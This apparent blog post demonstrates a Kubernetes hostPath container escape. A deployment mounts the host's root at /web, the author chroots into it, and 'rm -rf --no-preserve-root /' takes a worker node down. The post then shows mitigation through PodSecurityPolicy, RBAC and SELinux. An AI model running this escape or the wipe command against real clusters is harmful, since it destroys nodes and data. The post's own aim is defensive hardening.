This post will demonstrate how Kubernetes HostPath
volumes can help you get access to the Kubernetes nodes. Atleast you can play with the filesystem of the node on which you pod is scheduled on. You can get access to other containers running on the host, certificates of the kubelet, etc.
I have a 3-master and 3-node cluster and setup using this script, running in a Vagrant environment.
All the nodes are in ready state:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
worker-0 Ready <none> 24m v1.11.2 192.168.199.20 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-1 Ready <none> 23m v1.11.2 192.168.199.21 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-2 Ready <none> 21m v1.11.2 192.168.199.22 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
The deployment looks like this:
$ cat deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
run: web
name: web
spec:
replicas: 1
selector:
matchLabels:
run: web
template:
metadata:
labels:
run: web
spec:
containers:
- image: centos/httpd
name: web
volumeMounts:
- mountPath: /web
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
Above you can see we are mounting /
of the host inside pod at /web
. This is our gateway to host’s file system. Let’s deploy this:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
And now that pod has started:
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
web-66cdf67bbc-44zhj 1/1 Running 0 4m 10.38.0.1 worker-2 <none>
Getting inside the pod and checking out the mounted directory:
$ kubectl exec -it web-66cdf67bbc-44zhj bash
[root@web-66cdf67bbc-44zhj /]# cd /web
[root@web-66cdf67bbc-44zhj web]# ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv sys tmp usr vagrant var vmlinuz vmlinuz.old
Now we can either chroot
into this and see the output of ps
.
[root@web-66cdf67bbc-44zhj ~]# chroot /web
# ps aufx
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S 05:15 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 05:15 0:00 \_ [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 05:15 0:00 \_ [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 05:15 0:00 \_ [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 05:15 0:00 \_ [rcu_sched]
root 9 0.0 0.0 0 0 ? I 05:15 0:00 \_ [rcu_bh]
root 10 0.0 0.0 0 0 ? S 05:15 0:00 \_ [migration/0]
root 11 0.0 0.0 0 0 ? S 05:15 0:00 \_ [watchdog/0]
root 12 0.0 0.0 0 0 ? S 05:15 0:00 \_ [cpuhp/0]
Or you can just delete the entire root
, a.k.a. nuking the node.
# rm -rf --no-preserve-root /
Now if you look at the nodes:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
worker-0 Ready <none> 30m v1.11.2 192.168.199.20 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-1 Ready <none> 29m v1.11.2 192.168.199.21 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-2 NotReady <none> 27m v1.11.2 192.168.199.22 <none> Unknown 4.15.0-33-generic cri-o://Unknown
The last node worker-2
is in NotReady
state. We have successfully made one node unusable. Now that one node is gone your pod will be scheduled on another node, where you can do similar stuff.
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
web-66cdf67bbc-44zhj 0/1 Unknown 0 20m 10.38.0.1 worker-2 <none>
web-66cdf67bbc-b22xn 1/1 Running 0 8m 10.32.0.2 worker-0 <none>
As you can see above the pod is re-scheduled on node worker-0
. And we can do same set of steps to make worker-0
unusable.
Deleting the deployment to cleanup.
$ kubectl delete deployment web
deployment.extensions "web" deleted
Stopping this attack using PodSecurityPolicy
Now as a cluster admin how can you prevent this from happening? You can create something called as PodSecurityPolicy
. This let’s you define what kind of pods be created. Or what permissions pod can request. Enable admission controller for this, read about it here.
Here is an example PodSecurityPolicy
:
$ cat podsecuritypolicy.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: example
spec:
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
runAsUser:
rule: RunAsAny
fsGroup:
rule: RunAsAny
volumes:
- '*'
privileged: false # Don't allow privileged pods!
allowedHostPaths:
- pathPrefix: /foo
readOnly: true
In above example, we are restricting access to hostPath
a pod can request. Here the path that is allowed is /foo
and has readOnly
access to the underlying file system.
Create PodSecurityPolicy
using above file:
$ kubectl apply -f podsecuritypolicy.yaml
podsecuritypolicy.policy/example created
To enable this policy we need to create few more objects, a Role
and RoleBinding
.
Role
:
$ cat role.yaml
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: authorize-hostpath
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames:
- example
This Role
will allow usage of policy that we created above.
Create Role
:
$ kubectl apply -f role.yaml
role.rbac.authorization.k8s.io/authorize-hostpath created
RoleBinding
:
$ cat rolebinding.yaml
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: auth-hostpath
roleRef:
kind: Role
name: authorize-hostpath
apiGroup: rbac.authorization.k8s.io
subjects:
# Authorize all service accounts in a namespace:
- kind: Group
apiGroup: rbac.authorization.k8s.io
name: system:serviceaccounts
This RoleBinding
will bind the Role
above and all the ServiceAccounts
in current namespace.
Create RoleBinding
:
$ kubectl create -f rolebinding.yaml
rolebinding.rbac.authorization.k8s.io/auth-hostpath created
Now that we have required permissions in place, try to re-create the deployment
:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
The pod is not created and in events you can see an error as Error creating: pods "web-66cdf67bbc-" is forbidden: unable to validate against any pod security policy: [spec.volumes[0].hostPath.pathPrefix: Invalid value: "/": is not allowed to be used]
:
$ kubectl get events
LAST SEEN FIRST SEEN COUNT NAME KIND SUBOBJECT TYPE REASON SOURCE MESSAGE
...
6s 17s 12 web-66cdf67bbc.15530e83fd4f8592 ReplicaSet Warning FailedCreate replicaset-controller Error creating: pods "web-66cdf67bbc-" is forbidden: unable to validate against any pod security policy: [spec.volumes[0].hostPath.pathPrefix: Invalid value: "/": is not allowed to be used]
This error is due to the fact that we have allowed hostPath
to be only under /foo
and in the original file it is set to /
.
Now change in deployment.yaml
file at path deployment.spec.template.spec.volumes[0].hostPath.path
from /
to /foo
and apply again:
$ kubectl apply -f deployment.yaml
deployment.apps/web configured
You can see another error Error creating: pods "web-85cb548b47-" is forbidden: unable to validate against any pod security policy: [spec.containers[0].volumeMounts[0].readOnly: Invalid value: false: must be read-only]
:
$ kubectl get events
LAST SEEN FIRST SEEN COUNT NAME KIND SUBOBJECT TYPE REASON SOURCE MESSAGE
...
5s 15s 12 web-85cb548b47.15530eb0c27c6122 ReplicaSet Warning FailedCreate replicaset-controller Error creating: pods "web-85cb548b47-" is forbidden: unable to validate against any pod security policy: [spec.containers[0].volumeMounts[0].readOnly: Invalid value: false: must be read-only]
This is because in the volumeMount
’s readOnly
we have used in container has no value defined, which means it defaults to false
and in PodSecurityPolicy
we have defaulted the hostPath
to be readOnly
.
So change deployment.spec.template.spec.containers[0].volumeMounts[0].readOnly
to true
. And manifest should look like following:
$ cat deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
run: web
name: web
spec:
replicas: 1
selector:
matchLabels:
run: web
template:
metadata:
labels:
run: web
spec:
containers:
- image: centos/httpd
name: web
volumeMounts:
- mountPath: /web
name: test-volume
readOnly: true
volumes:
- name: test-volume
hostPath:
path: /foo
Now if you re-deploy the app:
$ kubectl apply -f deployment.yaml
deployment.apps/web configured
The pod is scheduled and created:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
web-7b77459d6b-kbqm8 1/1 Running 0 7s
Now if you exec into this pod and try to do something, you can see nothing happens:
$ kubectl exec -it web-7b77459d6b-kbqm8 bash
[root@web-7b77459d6b-kbqm8 /]# cd /web/
[root@web-7b77459d6b-kbqm8 web]# ls
[root@web-7b77459d6b-kbqm8 web]# touch file.txt
touch: cannot touch 'file.txt': Read-only file system
So this is really good feature you can use to stop someone from nuking your cluster.
Stopping this attack using SELinux
Above setup of the Kubernetes cluster had a Ubuntu based machines, now I have a Kubernetes cluster that is setup on Fedora which supports SELinux.
You can setup this cluster following steps in this post.
Note: This is a simple cluster setup without PodSecurityPolicy
.
Once you have the cluster running:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
fedora Ready master 23m v1.11.2 10.0.2.15 <none> Fedora 28 (Cloud Edition) 4.16.3-301.fc28.x86_64 docker://1.13.1
Lets follow the same set of steps of creating the deployment:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
The pod is created:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
web-66cdf67bbc-t9n7m 1/1 Running 0 28s
Getting into the machine:
$ kubectl exec -it web-66cdf67bbc-t9n7m bash
[root@web-66cdf67bbc-t9n7m /]#
[root@web-66cdf67bbc-t9n7m /]# cd /web/
[root@web-66cdf67bbc-t9n7m web]# ls
bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr vagrant var
[root@web-66cdf67bbc-t9n7m web]# touch file.txt
touch: cannot touch 'file.txt': Permission denied
As you can see if you go to the root of host which is mounted at /web
and try to create new file, it fails. This event will be logged into the SELinux audit logs. On host if you run following you will see logs:
# ausearch -m avc
----
time->Tue Sep 11 06:41:54 2018
type=AVC msg=audit(1536648114.522:985): avc: denied { write } for pid=15775 comm="touch" name="/" dev="sda1" ino=2 scontext=system_u:system_r:container_t:s0:c230,c784 tcontext=system_u:object_r:root_t:s0 tclass=dir permissive=0
Here simple SELinux has stopped the container from writing into places it shouldn’t. Compared to PodSecurityPolicy
(which is a beta feature in k8s 1.11), SELinux can help you right away if you are using older Kubernetes cluster and are on CentOS or RHEL.